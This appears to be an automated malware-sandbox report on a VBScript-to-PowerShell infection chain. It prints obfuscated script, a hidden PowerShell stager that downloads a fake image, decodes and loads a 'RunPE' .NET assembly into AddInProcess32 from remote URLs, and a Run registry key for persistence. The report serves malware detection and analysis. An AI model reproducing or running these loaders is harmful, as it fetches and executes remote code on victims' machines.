Binary string: System.Data.Linq.pdb source: powershell.exe, 00000005.00000002.1593249339.0000021C89401000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") posteridade = ("$perpetuadoralagoanodigalagoano = '") & berlinense & "'" posteridade = posteridade & ";$alagoanoWjuxd = [oxyosmiayoxyosmiatoutorgadamentem.Toutorgadamentext.outorgadamentenperpetuadoroding]::Uniperpetuadorodoutorgadamente.GoutorgadamentetString(" posteridade = posteridade & "[oxyosmiayoxyosmia" posteridade = posteridade & "toutorgadamente" posteridade = posteridade & "m.perpetuadoralagoano" posteridade = posteridade & "nvoutorgadamenter" posteridade = posteridade & "t]:" posteridade = posteridade & ":Fralagoano" posteridade = posteridade & "mbaoxyosmia" posteridade = posteridade & "outorgadamente64oxyosmiatring( $perpetuador" posteridade = posteridade & "alagoanod" posteridade = posteridade & "igalagoano.routorgadamente" posteridade = posteridade & "desoxygenarla" posteridade = posteridade & "perpetuadoroutorgadamente('" posteridade = posteridade & "DgTroutorgadamente" posteridade = posteridade & "','" posteridade = posteridade & "A" posteridade = posteridade & "') ))" posteridade = posteridade & ";desoxygenaralagoanoweroxyosmiahell.outorgadamentexoutorgadamente -windowoxyosmiatyloutorgadamente hiddoutorgadamenten -outorgadamentexoutorgadamentecutiondesoxygenarolicy bydesoxygenarasoxyosmia -Nodesoxygenarrofiloutorgadamente -command $OWjuxD" posteridade = Replace(posteridade,"desoxygenar","p") posteridade = Replace(posteridade,"perpetuador","c") posteridade = Replace(posteridade,"outorgadamente","e") posteridade = Replace(posteridade,"alagoano","o") posteridade = Replace(posteridade,"oxyosmia","s") dionina1 = "desoxygenaralagoanoweroxyosmiahell -perpetuadoralagoanommand " dionina1 = Replace(dionina1,"perpetuador","c") dionina1 = Replace(dionina1,"oxyosmia","s") dionina1 = Replace(dionina1,"alagoano","o") dionina1 = Replace(dionina1,"desoxygenar","p") dionina = dionina1 & """" & posteridade & """" Cama.Run dionina, 0, False IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/3dasY", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTreb

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_01699808 push esp; iretd	9_2_01699809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_065D3400 pushfd ; ret	9_2_065D3401
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_065D3388 push esp; ret	9_2_065D3389
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_066FF6A3 pushfd ; iretd	9_2_066FF6A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_066FF1D3 push eax; retf	9_2_066FF1D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_067035B8 push esp; retf 0643h	9_2_067035C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_067F06F0 push eax; iretd	9_2_067F06F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_067F4378 pushfd ; iretd	9_2_067F4385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_067FD861 push C0065C6Fh; iretd	9_2_067FD86D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_06836192 push eax; iretd	9_2_06836199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_0684A780 pushfd ; ret	9_2_0684A78D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_0684A2F8 push esp; ret	9_2_0684A305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 9_2_0684A329 pushad ; ret	9_2_0684A335

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbs

Check if machine is in data center or colocation facility

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
